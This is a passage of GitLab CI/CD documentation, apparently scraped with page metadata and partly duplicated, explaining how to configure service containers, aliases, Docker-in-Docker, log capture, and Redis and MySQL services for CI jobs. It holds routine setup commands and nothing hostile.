`svc-i` pattern does not indicate the service's position in the provided list. Instead, it represents the service's position when no available alias is found. - When an invalid alias is provided (doesn't meet Kubernetes constraint), the job fails with the following error (example with the alias `alpine_edge`). This failure occurs because aliases are also used to create local DNS entries on the job Pod. ```plaintext ERROR: Job failed (system failure): prepare environment: setting up build pod: provided host alias alpine_edge for service alpine:edge is invalid DNS. a lowercase RFC 1123 subdomain must consist of lower case alphanumeric characters, '-' or '.', and must start and end with an alphanumeric character (e.g. 'example.com', regex used for validation is '[a-z0-9]([-a-z0-9]*[a-z0-9])?(\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*'). Check https://docs.gitlab.com/runner/shells/index.html#shell-profile-loading for more information. ``` ## Using `services` with `docker run` (Docker-in-Docker) side-by-side Containers started with `docker run` can also connect to services provided by GitLab. If booting a service is expensive or time consuming, you can run tests from different client environments, while booting up the tested service only once. ```yaml access-service: stage: build image: docker:20.10.16 services: - docker:dind # necessary for docker run - tutum/wordpress:latest variables: FF_NETWORK_PER_BUILD: "true" # activate container-to-container networking script: | docker run --rm --name curl \ --volume "$(pwd)":"$(pwd)" \ --workdir "$(pwd)" \ --network=host \ curlimages/curl:7.74.0 curl "http://tutum-wordpress" ``` For this solution to work, you must: - Use [the networking mode that creates a new network for each job](https://docs.gitlab.com/runner/executors/docker.html#create-a-network-for-each-job). - [Not use the Docker executor with Docker socket binding](../docker/using_docker_build.md#use-docker-socket-binding). If you must, then in the previous example, instead of `host`, use the dynamic network name created for this job. ## How Docker integration works The following is a high level overview of the steps performed by Docker during job time. 1. Create any service container: `mysql`, `postgresql`, `mongodb`, `redis`. 1. Create a cache container to store all volumes as defined in `config.toml` and `Dockerfile` of build image (`ruby:2.6` as in the previous examples). 1. Create a build container and link any service container to build container. 1. Start the build container, and send a job script to the container. 1. Run the job script. 1. Checkout code in: `/builds/group-name/project-name/`. 1. Run any step defined in `.gitlab-ci.yml`. 1. Check the exit status of build script. 1. Remove the build container and all created service containers. ## Capturing service container logs {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/merge_requests/3680) in GitLab Runner 15.6. {{< /history >}} Logs generated by applications running in service containers can be captured for subsequent examination and debugging. View service container logs when a service container starts successfully but causes job failures due to unexpected behavior. The logs can indicate missing or incorrect configuration of the service in the container. `CI_DEBUG_SERVICES` should only be enabled when service containers are being actively debugged as there are both storage and performance consequences to capturing service container logs. To enable service logging, add the `CI_DEBUG_SERVICES` variable to the project's `.gitlab-ci.yml` file: ```yaml variables: CI_DEBUG_SERVICES: "true" ``` Accepted values are: - Enabled: `TRUE`, `true`, `True` - Disabled: `FALSE`, `false`, `False` Any other values result in an error message and effectively disable the feature. When enabled, logs for all service containers are captured and streamed into the jobs trace log concurrently with other logs. Logs from each container are prefixed with the container's aliases, and displayed in a different color. {{< alert type="note" >}} To diagnose job failures, you can adjust the logging level in your service container for which you want to capture logs. The default logging level might not provide sufficient troubleshooting information. {{< /alert >}} {{< alert type="warning" >}} Enabling `CI_DEBUG_SERVICES` might reveal masked variables. When `CI_DEBUG_SERVICES` is enabled, service container logs and the CI job's logs are streamed to the job's trace log concurrently. This means that the service container logs might get inserted into a job's masked log. This would thwart the variable masking mechanism and result in the masked variable being revealed. {{< /alert >}} See [Mask a CI/CD Variable](../variables/_index.md#mask-a-cicd-variable) ## Debug a job locally The following commands are run without root privileges. Verify that you can run Docker commands with your user account. First start by creating a file named `build_script`: ```shell cat <<EOF > build_script git clone https://gitlab.com/gitlab-org/gitlab-runner.git /builds/gitlab-org/gitlab-runner cd /builds/gitlab-org/gitlab-runner make runner-bin-host EOF ``` Here we use as an example the GitLab Runner repository which contains a Makefile, so running `make` executes the target defined in the Makefile. Instead of `make runner-bin-host`, you could run the command which is specific to your project. Then create a service container: ```shell docker run -d --name service-redis redis:latest ``` The previous command creates a service container named `service-redis` using the latest Redis image. The service container runs in the background (`-d`). Finally, create a build container by executing the `build_script` file we created earlier: ```shell docker run --name build -i --link=service-redis:redis golang:latest /bin/bash < build_script ``` The previous command creates a container named `build` that is spawned from the `golang:latest` image and has one service linked to it. The `build_script` is piped using `stdin` to the bash interpreter which in turn executes the `build_script` in the `build` container. Use the following command to remove containers after testing is complete: ```shell docker rm -f -v build service-redis ``` This forcefully (`-f`) removes the `build` container, the service container, and all volumes (`-v`) that were created with the container creation. ## Security when using services containers Docker privileged mode applies to services. This means that the service image container can access the host system. You should use container images from trusted sources only. ## Shared `/builds` directory The build directory is mounted as a volume under `/builds` and is shared between the job and services. The job checks the project out into `/builds/$CI_PROJECT_PATH` after the services are running. Your service might need to access project files or store artifacts. If so, wait for the directory to exist and for `$CI_COMMIT_SHA` to be checked out. Any changes made before the job finishes its checkout process are removed by the checkout process. The service must detect when the job directory is populated and ready for processing. For example, wait for a specific file to become available. Services that start working immediately when launched are likely to fail, as the job data may not be available yet. For example, containers use the `docker build` command to make a network connection to the DinD service. The service instructs its API to start a container image build. The Docker Engine must have access to the files you're referencing in your Dockerfile. Hence, you need access to the `CI_PROJECT_DIR` in the service. However, Docker Engine does not try to access it until the `docker build` command is called in a job. At this time, the `/builds` directory is already populated with data. The service that tries to write the `CI_PROJECT_DIR` immediately after it started might fail with a `No such file or directory` error. In scenarios where services that interact with job data are not controlled by the job itself, consider the [Docker executor workflow](https://docs.gitlab.com/runner/executors/docker.html#docker-executor-workflow).
--- stage: Verify group: Runner info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Services breadcrumbs: - doc - ci - services --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} When you configure CI/CD, you specify an image, which is used to create the container where your jobs run. To specify this image, you use the `image` keyword. You can specify an additional image by using the `services` keyword. This additional image is used to create another container, which is available to the first container. The two containers have access to one another and can communicate when running the job. The service image can run any application, but the most common use case is to run a database container, for example: - [MySQL](mysql.md) - [PostgreSQL](postgres.md) - [Redis](redis.md) - [GitLab](gitlab.md) as an example for a microservice offering a JSON API Consider that you're developing a content management system that uses database for storage. You need a database to test all features in the application. Running a database container as a service image is a good use case in this scenario. Use an existing image and run it as an additional container instead of installing `mysql` every time you build a project. You're not limited to only database services. You can add as many services you need to `.gitlab-ci.yml` or manually modify the [`config.toml`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html). Any image found at [Docker Hub](https://hub.docker.com/) or your private container registry can be used as a service. For information about using private images, see [Access an image from a private container registry](../docker/using_docker_images.md#access-an-image-from-a-private-container-registry). Services inherit the same DNS servers, search domains, and additional hosts as the CI container itself. ## How services are linked to the job To better understand how container linking works, read [Linking containers together](https://docs.docker.com/network/links/). If you add `mysql` as service to your application, the image is used to create a container that's linked to the job container. The service container for MySQL is accessible under the hostname `mysql`. To access your database service, connect to the host named `mysql` instead of a socket or `localhost`. Read more in [accessing the services](#accessing-the-services). ## How the health check of services works Services are designed to provide additional features which are **network accessible**. They may be a database like MySQL, or Redis, and even `docker:dind` which allows you to use Docker-in-Docker (DinD). It can be practically anything that's required for the CI/CD job to proceed, and is accessed by network. To make sure this works, the runner: 1. Checks which ports are exposed from the container by default. 1. Starts a special container that waits for these ports to be accessible. If the second stage of the check fails, it prints the warning: `*** WARNING: Service XYZ probably didn't start properly`. This issue can occur because: - There is no opened port in the service. - The service was not started properly before the timeout, and the port is not responding. In most cases it affects the job, but there may be situations when the job still succeeds even if that warning was printed. For example: - The service was started shortly after the warning was raised, and the job is not using the linked service from the beginning. In that case, when the job needed to access the service, it may have been already there waiting for connections. - The service container is not providing any networking service, but it's doing something with the job's directory (all services have the job directory mounted as a volume under `/builds`). In that case, the service does its job, and because the job is not trying to connect to it, it does not fail. If the services start successfully, they start before the [`before_script`](../yaml/_index.md#before_script) runs. This means you can write a `before_script` that queries the service. Services stop at the end of the job, even if the job fails. ## Using software provided by a service image When you specify the `service`, this provides **network accessible** services. A database is the simplest example of such a service. The services feature does not add any software from the defined `services` images to the job's container. For example, if you have the following `services` defined in your job, the `php`, `node` or `go` commands are **not** available for your script, and the job fails: ```yaml job: services: - php:7 - node:latest - golang:1.10 image: alpine:3.7 script: - php -v - node -v - go version ``` If you need to have `php`, `node` and `go` available for your script, you should either: - Choose an existing Docker image that contains all required tools. - Create your own Docker image, with all the required tools included, and use that in your job. ## Define `services` in the `.gitlab-ci.yml` file It's also possible to define different images and services per job: ```yaml default: before_script: - bundle install test:2.6: image: ruby:2.6 services: - postgres:11.7 script: - bundle exec rake spec test:2.7: image: ruby:2.7 services: - postgres:12.2 script: - bundle exec rake spec ``` Or you can pass some [extended configuration options](../docker/using_docker_images.md#extended-docker-configuration-options) for `image` and `services`: ```yaml default: image: name: ruby:2.6 entrypoint: ["/bin/bash"] services: - name: my-postgres:11.7 alias: db,postgres,pg entrypoint: ["/usr/local/bin/db-postgres"] command: ["start"] before_script: - bundle install test: script: - bundle exec rake spec ``` ## Accessing the services If you need a Wordpress instance to test API integration with your application, you can use the [`tutum/wordpress`](https://hub.docker.com/r/tutum/wordpress/) image in your `.gitlab-ci.yml` file: ```yaml services: - tutum/wordpress:latest ``` If you don't [specify a service alias](#available-settings-for-services), when the job runs, `tutum/wordpress` is started. You have access to it from your build container under two hostnames: - `tutum-wordpress` - `tutum__wordpress` Hostnames with underscores are not RFC valid and may cause problems in third-party applications. The default aliases for the service's hostname are created from its image name following these rules: - Everything after the colon (`:`) is stripped. - Slash (`/`) is replaced with double underscores (`__`) and the primary alias is created. - Slash (`/`) is replaced with a single dash (`-`) and the secondary alias is created. To override the default behavior, you can [specify one or more service aliases](#available-settings-for-services). ### Connecting services You can use inter-dependent services with complex jobs, like end-to-end tests where an external API needs to communicate with its own database. For example, for an end-to-end test for a front-end application that uses an API, and where the API needs a database: ```yaml end-to-end-tests: image: node:latest services: - name: selenium/standalone-firefox:${FIREFOX_VERSION} alias: firefox - name: registry.gitlab.com/organization/private-api:latest alias: backend-api - name: postgres:14.3 alias: db postgres db variables: FF_NETWORK_PER_BUILD: 1 POSTGRES_PASSWORD: supersecretpassword BACKEND_POSTGRES_HOST: postgres script: - npm install - npm test ``` For this solution to work, you must use [the networking mode that creates a new network for each job](https://docs.gitlab.com/runner/executors/docker.html#create-a-network-for-each-job). ## Passing CI/CD variables to services You can also pass custom CI/CD [variables](../variables/_index.md) to fine tune your Docker `images` and `services` directly in the `.gitlab-ci.yml` file. For more information, read about [`.gitlab-ci.yml` defined variables](../variables/_index.md#define-a-cicd-variable-in-the-gitlab-ciyml-file). ```yaml # The following variables are automatically passed down to the Postgres container # as well as the Ruby container and available within each. variables: HTTPS_PROXY: "https://10.1.1.1:8090" HTTP_PROXY: "https://10.1.1.1:8090" POSTGRES_DB: "my_custom_db" POSTGRES_USER: "postgres" POSTGRES_PASSWORD: "example" PGDATA: "/var/lib/postgresql/data" POSTGRES_INITDB_ARGS: "--encoding=UTF8 --data-checksums" default: services: - name: postgres:11.7 alias: db entrypoint: ["docker-entrypoint.sh"] command: ["postgres"] image: name: ruby:2.6 entrypoint: ["/bin/bash"] before_script: - bundle install test: script: - bundle exec rake spec ``` ## Available settings for `services` | Setting | Required | GitLab version | Description | | ------------- | ------------------------------------ | -------------- | ----------- | | `name` | yes, when used with any other option | 9.4 | Full name of the image to use. If the full image name includes a registry hostname, use the `alias` option to define a shorter service access name. For more information, see [Accessing the services](#accessing-the-services). | | `entrypoint` | no | 9.4 | Command or script to execute as the container's entrypoint. It's translated to the Docker `--entrypoint` option while creating the container. The syntax is similar to [`Dockerfile`'s `ENTRYPOINT`](https://docs.docker.com/reference/dockerfile/#entrypoint) directive, where each shell token is a separate string in the array. | | `command` | no | 9.4 | Command or script that should be used as the container's command. It's translated to arguments passed to Docker after the image's name. The syntax is similar to [`Dockerfile`'s `CMD`](https://docs.docker.com/reference/dockerfile/#cmd) directive, where each shell token is a separate string in the array. | | `alias` | no | 9.4 | Additional aliases to access the service from the job's container. Multiple aliases can be separated by spaces or commas. For more information, see [Accessing the services](#accessing-the-services). Using alias as a container name for the Kubernetes executor was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/421131) in GitLab Runner 17.9. For more information, see [Configuring the service containers name with the Kubernetes executor](#using-aliases-as-service-container-names-for-the-kubernetes-executor). | | `variables` | no | 14.5 | Additional environment variables that are passed exclusively to the service. The syntax is the same as [Job Variables](../variables/_index.md). Service variables cannot reference themselves. | | `pull_policy` | no | 15.1 | Specify how the runner pulls Docker images when it executes a job. Valid values are `always`, `if-not-present`, and `never`. Default is `always`. For more information, see [services:pull_policy](../yaml/_index.md#servicespull_policy). | ## Starting multiple services from the same image Before the new extended Docker configuration options, the following configuration would not work properly: ```yaml services: - mysql:latest - mysql:latest ``` The runner would start two containers, each that uses the `mysql:latest` image. However, both of them would be added to the job's container with the `mysql` alias, based on the [default hostname naming](#accessing-the-services). This would end with one of the services not being accessible. After the new extended Docker configuration options, the previous example would look like this: ```yaml services: - name: mysql:latest alias: mysql-1 - name: mysql:latest alias: mysql-2 ``` The runner still starts two containers using the `mysql:latest` image, however now each of them are also accessible with the alias configured in `.gitlab-ci.yml` file. ## Setting a command for the service Let's assume you have a `super/sql:latest` image with some SQL database in it. You would like to use it as a service for your job. Let's also assume that this image does not start the database process while starting the container. The user needs to manually use `/usr/bin/super-sql run` as a command to start the database. Before the new extended Docker configuration options, you would need to: - Create your own image based on the `super/sql:latest` image. - Add the default command. - Use the image in the job's configuration. - `my-super-sql:latest` image's Dockerfile: ```dockerfile FROM super/sql:latest CMD ["/usr/bin/super-sql", "run"] ``` - In the job in the `.gitlab-ci.yml`: ```yaml services: - my-super-sql:latest ``` After the new extended Docker configuration options, you can set a `command` in the `.gitlab-ci.yml` file instead: ```yaml services: - name: super/sql:latest command: ["/usr/bin/super-sql", "run"] ``` The syntax of `command` is similar to [Dockerfile `CMD`](https://docs.docker.com/reference/dockerfile/#cmd). ## Using aliases as service container names for the Kubernetes executor {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/421131) in GitLab and GitLab Runner 17.9. {{< /history >}} You can use service aliases as service container names for the Kubernetes executor. GitLab Runner names containers based on the following conditions: - When multiple aliases are set for a service, the service container is named after the first alias that: - Isn't already used by another service container. - Follows the [Kubernetes constraints for label names](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names). - When aliases can't be used to name a service container, GitLab Runner falls back to the `svc-i` pattern. The following examples illustrate how aliases are used to name service containers for the Kubernetes executor. ### One alias per services In the following `.gitlab-ci.yml` file: ```yaml job: image: alpine:latest script: - sleep 10 services: - name: alpine:latest alias: alpine - name: mysql:latest alias: mysql ``` The system creates job Pod with containers named `alpine` and `mysql` in addition to the standard `build` and `helper` containers. These aliases are used because they: - Are not used by another service container. - Follow the [Kubernetes constraints for label names](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names). However, in the following `.gitlab-ci.yml`: ```yaml job: image: alpine:latest script: - sleep 10 services: - name: mysql:lts alias: mysql - name: mysql:latest alias: mysql ``` The system creates two more containers named `mysql` and `svc-0` in addition to the `build` and `helper` containers. The `mysql` container corresponds to the `mysql:lts` image, while the `svc-0` container corresponds to the `mysql:latest` image. ### Multiple aliases per services In the following `.gitlab-ci.yml` file: ```yaml job: image: alpine:latest script: - sleep 10 services: - name: alpine:latest alias: alpine,alpine-latest - name: alpine:edge alias: alpine,alpine-edge,alpine-latest ``` The system creates four more containers in addition to the `build` and `helper` containers: - `alpine` which should correspond to the container with the `alpine:latest` image. - `alpine-edge` which should correspond to the container with the `alpine:edge` image (`alpine` alias being already used for the previous container). In this example, the alias `alpine-latest` is not being used. However, in the following `.gitlab-ci.yml`: ```yaml job: image: alpine:latest script: - sleep 10 services: - name: alpine:latest alias: alpine,alpine-edge - name: alpine:edge alias: alpine,alpine-edge - name: alpine:3.21 alias: alpine,alpine-edge ``` In addition to the `build` and `helper` containers, six more containers are created. - `alpine` should refer to the container with the `alpine:latest` image. - `alpine-edge` should refer to the container with the `alpine:edge` image (`alpine` alias being already used for the previous container). - `svc-0` should refer to the container with the `alpine:3.21` image (`alpine` and `alpine-edge` aliases being already used for the previous containers). - The `i` in the `svc-i` pattern does not indicate the service's position in the provided list. Instead, it represents the service's position when no available alias is found. - When an invalid alias is provided (doesn't meet Kubernetes constraint), the job fails with the following error (example with the alias `alpine_edge`). This failure occurs because aliases are also used to create local DNS entries on the job Pod. ```plaintext ERROR: Job failed (system failure): prepare environment: setting up build pod: provided host alias alpine_edge for service alpine:edge is invalid DNS. a lowercase RFC 1123 subdomain must consist of lower case alphanumeric characters, '-' or '.', and must start and end with an alphanumeric character (e.g. 'example.com', regex used for validation is '[a-z0-9]([-a-z0-9]*[a-z0-9])?(\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*'). Check https://docs.gitlab.com/runner/shells/index.html#shell-profile-loading for more information. ``` ## Using `services` with `docker run` (Docker-in-Docker) side-by-side Containers started with `docker run` can also connect to services provided by GitLab. If booting a service is expensive or time consuming, you can run tests from different client environments, while booting up the tested service only once. ```yaml access-service: stage: build image: docker:20.10.16 services: - docker:dind # necessary for docker run - tutum/wordpress:latest variables: FF_NETWORK_PER_BUILD: "true" # activate container-to-container networking script: | docker run --rm --name curl \ --volume "$(pwd)":"$(pwd)" \ --workdir "$(pwd)" \ --network=host \ curlimages/curl:7.74.0 curl "http://tutum-wordpress" ``` For this solution to work, you must: - Use [the networking mode that creates a new network for each job](https://docs.gitlab.com/runner/executors/docker.html#create-a-network-for-each-job). - [Not use the Docker executor with Docker socket binding](../docker/using_docker_build.md#use-docker-socket-binding). If you must, then in the previous example, instead of `host`, use the dynamic network name created for this job. ## How Docker integration works The following is a high level overview of the steps performed by Docker during job time. 1. Create any service container: `mysql`, `postgresql`, `mongodb`, `redis`. 1. Create a cache container to store all volumes as defined in `config.toml` and `Dockerfile` of build image (`ruby:2.6` as in the previous examples). 1. Create a build container and link any service container to build container. 1. Start the build container, and send a job script to the container. 1. Run the job script. 1. Checkout code in: `/builds/group-name/project-name/`. 1. Run any step defined in `.gitlab-ci.yml`. 1. Check the exit status of build script. 1. Remove the build container and all created service containers. ## Capturing service container logs {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/merge_requests/3680) in GitLab Runner 15.6. {{< /history >}} Logs generated by applications running in service containers can be captured for subsequent examination and debugging. View service container logs when a service container starts successfully but causes job failures due to unexpected behavior. The logs can indicate missing or incorrect configuration of the service in the container. `CI_DEBUG_SERVICES` should only be enabled when service containers are being actively debugged as there are both storage and performance consequences to capturing service container logs. To enable service logging, add the `CI_DEBUG_SERVICES` variable to the project's `.gitlab-ci.yml` file: ```yaml variables: CI_DEBUG_SERVICES: "true" ``` Accepted values are: - Enabled: `TRUE`, `true`, `True` - Disabled: `FALSE`, `false`, `False` Any other values result in an error message and effectively disable the feature. When enabled, logs for all service containers are captured and streamed into the jobs trace log concurrently with other logs. Logs from each container are prefixed with the container's aliases, and displayed in a different color. {{< alert type="note" >}} To diagnose job failures, you can adjust the logging level in your service container for which you want to capture logs. The default logging level might not provide sufficient troubleshooting information. {{< /alert >}} {{< alert type="warning" >}} Enabling `CI_DEBUG_SERVICES` might reveal masked variables. When `CI_DEBUG_SERVICES` is enabled, service container logs and the CI job's logs are streamed to the job's trace log concurrently. This means that the service container logs might get inserted into a job's masked log. This would thwart the variable masking mechanism and result in the masked variable being revealed. {{< /alert >}} See [Mask a CI/CD Variable](../variables/_index.md#mask-a-cicd-variable) ## Debug a job locally The following commands are run without root privileges. Verify that you can run Docker commands with your user account. First start by creating a file named `build_script`: ```shell cat <<EOF > build_script git clone https://gitlab.com/gitlab-org/gitlab-runner.git /builds/gitlab-org/gitlab-runner cd /builds/gitlab-org/gitlab-runner make runner-bin-host EOF ``` Here we use as an example the GitLab Runner repository which contains a Makefile, so running `make` executes the target defined in the Makefile. Instead of `make runner-bin-host`, you could run the command which is specific to your project. Then create a service container: ```shell docker run -d --name service-redis redis:latest ``` The previous command creates a service container named `service-redis` using the latest Redis image. The service container runs in the background (`-d`). Finally, create a build container by executing the `build_script` file we created earlier: ```shell docker run --name build -i --link=service-redis:redis golang:latest /bin/bash < build_script ``` The previous command creates a container named `build` that is spawned from the `golang:latest` image and has one service linked to it. The `build_script` is piped using `stdin` to the bash interpreter which in turn executes the `build_script` in the `build` container. Use the following command to remove containers after testing is complete: ```shell docker rm -f -v build service-redis ``` This forcefully (`-f`) removes the `build` container, the service container, and all volumes (`-v`) that were created with the container creation. ## Security when using services containers Docker privileged mode applies to services. This means that the service image container can access the host system. You should use container images from trusted sources only. ## Shared `/builds` directory The build directory is mounted as a volume under `/builds` and is shared between the job and services. The job checks the project out into `/builds/$CI_PROJECT_PATH` after the services are running. Your service might need to access project files or store artifacts. If so, wait for the directory to exist and for `$CI_COMMIT_SHA` to be checked out. Any changes made before the job finishes its checkout process are removed by the checkout process. The service must detect when the job directory is populated and ready for processing. For example, wait for a specific file to become available. Services that start working immediately when launched are likely to fail, as the job data may not be available yet. For example, containers use the `docker build` command to make a network connection to the DinD service. The service instructs its API to start a container image build. The Docker Engine must have access to the files you're referencing in your Dockerfile. Hence, you need access to the `CI_PROJECT_DIR` in the service. However, Docker Engine does not try to access it until the `docker build` command is called in a job. At this time, the `/builds` directory is already populated with data. The service that tries to write the `CI_PROJECT_DIR` immediately after it started might fail with a `No such file or directory` error. In scenarios where services that interact with job data are not controlled by the job itself, consider the [Docker executor workflow](https://docs.gitlab.com/runner/executors/docker.html#docker-executor-workflow).
https://docs.gitlab.com/ci/redis
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/redis.md
2025-08-13
doc/ci/services
[ "doc", "ci", "services" ]
redis.md
Verify
Runner
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Using Redis
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} As many applications depend on Redis as their key-value store, you have to use it to run your tests. ## Use Redis with the Docker executor If you are using [GitLab Runner](../runners/_index.md) with the Docker executor you basically have everything set up already. First, in your `.gitlab-ci.yml` add: ```yaml services: - redis:latest ``` Then you need to configure your application to use the Redis database, for example: ```yaml Host: redis ``` And that's it. Redis is now available to be used in your testing framework. You can also use any other Docker image available on [Docker Hub](https://hub.docker.com/_/redis). For example, to use Redis 6.0 the service becomes `redis:6.0`. ## Use Redis with the Shell executor Redis can also be used on manually configured servers that are using GitLab Runner with the Shell executor. In your build machine install the Redis server: ```shell sudo apt-get install redis-server ``` Verify that you can connect to the server with the `gitlab-runner` user: ```shell # Try connecting the Redis server sudo -u gitlab-runner -H redis-cli # Quit the session 127.0.0.1:6379> quit ``` Finally, configure your application to use the database, for example: ```yaml Host: localhost ``` ## Example project We have set up an [Example Redis Project](https://gitlab.com/gitlab-examples/redis) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly available [instance runners](../runners/_index.md). Want to hack on it? Fork it, commit and push your changes. In a few moments the changes are picked by a public runner and the job begins.
--- stage: Verify group: Runner info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Using Redis breadcrumbs: - doc - ci - services --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} As many applications depend on Redis as their key-value store, you have to use it to run your tests. ## Use Redis with the Docker executor If you are using [GitLab Runner](../runners/_index.md) with the Docker executor you basically have everything set up already. First, in your `.gitlab-ci.yml` add: ```yaml services: - redis:latest ``` Then you need to configure your application to use the Redis database, for example: ```yaml Host: redis ``` And that's it. Redis is now available to be used in your testing framework. You can also use any other Docker image available on [Docker Hub](https://hub.docker.com/_/redis). For example, to use Redis 6.0 the service becomes `redis:6.0`. ## Use Redis with the Shell executor Redis can also be used on manually configured servers that are using GitLab Runner with the Shell executor. In your build machine install the Redis server: ```shell sudo apt-get install redis-server ``` Verify that you can connect to the server with the `gitlab-runner` user: ```shell # Try connecting the Redis server sudo -u gitlab-runner -H redis-cli # Quit the session 127.0.0.1:6379> quit ``` Finally, configure your application to use the database, for example: ```yaml Host: localhost ``` ## Example project We have set up an [Example Redis Project](https://gitlab.com/gitlab-examples/redis) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly available [instance runners](../runners/_index.md). Want to hack on it? Fork it, commit and push your changes. In a few moments the changes are picked by a public runner and the job begins.
https://docs.gitlab.com/ci/mysql
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/mysql.md
2025-08-13
doc/ci/services
[ "doc", "ci", "services" ]
mysql.md
Verify
Runner
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Using MySQL
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Many applications depend on MySQL as their database, and you may need it for your tests to run. ## Use MySQL with the Docker executor If you want to use a MySQL container, you can use [GitLab Runner](../runners/_index.md) with the Docker executor. This example shows you how to set a username and password that GitLab uses to access the MySQL container. If you do not set a username and password, you must use `root`. {{< alert type="note" >}} Variables set in the GitLab UI are not passed down to the service containers. For more information, see [GitLab CI/CD variables](../variables/_index.md). {{< /alert >}} 1. To specify a MySQL image, add the following to your `.gitlab-ci.yml` file: ```yaml services: - mysql:latest ``` - You can use any Docker image available on [Docker Hub](https://hub.docker.com/_/mysql/). For example, to use MySQL 5.5, use `mysql:5.5`. - The `mysql` image can accept environment variables. For more information, view the [Docker Hub documentation](https://hub.docker.com/_/mysql/). 1. To include the database name and password, add the following to your `.gitlab-ci.yml` file: ```yaml variables: # Configure mysql environment variables (https://hub.docker.com/_/mysql/) MYSQL_DATABASE: $MYSQL_DB MYSQL_ROOT_PASSWORD: $MYSQL_PASS ``` The MySQL container uses `MYSQL_DATABASE` and `MYSQL_ROOT_PASSWORD` to connect to the database. Pass these values by using [GitLab CI/CD variables](../variables/_index.md) (`$MYSQL_DB` and `$MYSQL_PASS` in the example above), [rather than calling them directly](https://gitlab.com/gitlab-org/gitlab/-/issues/30178). 1. Configure your application to use the database, for example: ```yaml Host: mysql User: runner Password: <your_mysql_password> Database: <your_mysql_database> ``` In this example, the user is `runner`. You should use a user that has permission to access your database. ## Use MySQL with the Shell executor You can also use MySQL on manually-configured servers that use GitLab Runner with the Shell executor. 1. Install the MySQL server: ```shell sudo apt-get install -y mysql-server mysql-client libmysqlclient-dev ``` 1. Choose a MySQL root password and type it twice when asked. {{< alert type="note" >}} As a security measure, you can run `mysql_secure_installation` to remove anonymous users, drop the test database, and disable remote logins by the root user. {{< /alert >}} 1. Create a user by logging in to MySQL as root: ```shell mysql -u root -p ``` 1. Create a user (in this case, `runner`) that is used by your application. Change `$password` in the command to a strong password. At the `mysql>` prompt, type: ```sql CREATE USER 'runner'@'localhost' IDENTIFIED BY '$password'; ``` 1. Create the database: ```sql CREATE DATABASE IF NOT EXISTS `<your_mysql_database>` DEFAULT CHARACTER SET `utf8` \ COLLATE `utf8_unicode_ci`; ``` 1. Grant the necessary permissions on the database: ```sql GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, CREATE TEMPORARY TABLES, DROP, INDEX, ALTER, LOCK TABLES ON `<your_mysql_database>`.* TO 'runner'@'localhost'; ``` 1. If all went well, you can quit the database session: ```shell \q ``` 1. Connect to the newly-created database to check that everything is in place: ```shell mysql -u runner -p -D <your_mysql_database> ``` 1. Configure your application to use the database, for example: ```shell Host: localhost User: runner Password: $password Database: <your_mysql_database> ``` ## Example project To view a MySQL example, create a fork of this [sample project](https://gitlab.com/gitlab-examples/mysql). This project uses publicly-available [instance runners](../runners/_index.md) on [GitLab.com](https://gitlab.com). Update the README.md file, commit your changes, and view the CI/CD pipeline to see it in action.
--- stage: Verify group: Runner info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Using MySQL breadcrumbs: - doc - ci - services --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Many applications depend on MySQL as their database, and you may need it for your tests to run. ## Use MySQL with the Docker executor If you want to use a MySQL container, you can use [GitLab Runner](../runners/_index.md) with the Docker executor. This example shows you how to set a username and password that GitLab uses to access the MySQL container. If you do not set a username and password, you must use `root`. {{< alert type="note" >}} Variables set in the GitLab UI are not passed down to the service containers. For more information, see [GitLab CI/CD variables](../variables/_index.md). {{< /alert >}} 1. To specify a MySQL image, add the following to your `.gitlab-ci.yml` file: ```yaml services: - mysql:latest ``` - You can use any Docker image available on [Docker Hub](https://hub.docker.com/_/mysql/). For example, to use MySQL 5.5, use `mysql:5.5`. - The `mysql` image can accept environment variables. For more information, view the [Docker Hub documentation](https://hub.docker.com/_/mysql/). 1. To include the database name and password, add the following to your `.gitlab-ci.yml` file: ```yaml variables: # Configure mysql environment variables (https://hub.docker.com/_/mysql/) MYSQL_DATABASE: $MYSQL_DB MYSQL_ROOT_PASSWORD: $MYSQL_PASS ``` The MySQL container uses `MYSQL_DATABASE` and `MYSQL_ROOT_PASSWORD` to connect to the database. Pass these values by using [GitLab CI/CD variables](../variables/_index.md) (`$MYSQL_DB` and `$MYSQL_PASS` in the example above), [rather than calling them directly](https://gitlab.com/gitlab-org/gitlab/-/issues/30178). 1. Configure your application to use the database, for example: ```yaml Host: mysql User: runner Password: <your_mysql_password> Database: <your_mysql_database> ``` In this example, the user is `runner`. You should use a user that has permission to access your database. ## Use MySQL with the Shell executor You can also use MySQL on manually-configured servers that use GitLab Runner with the Shell executor. 1. Install the MySQL server: ```shell sudo 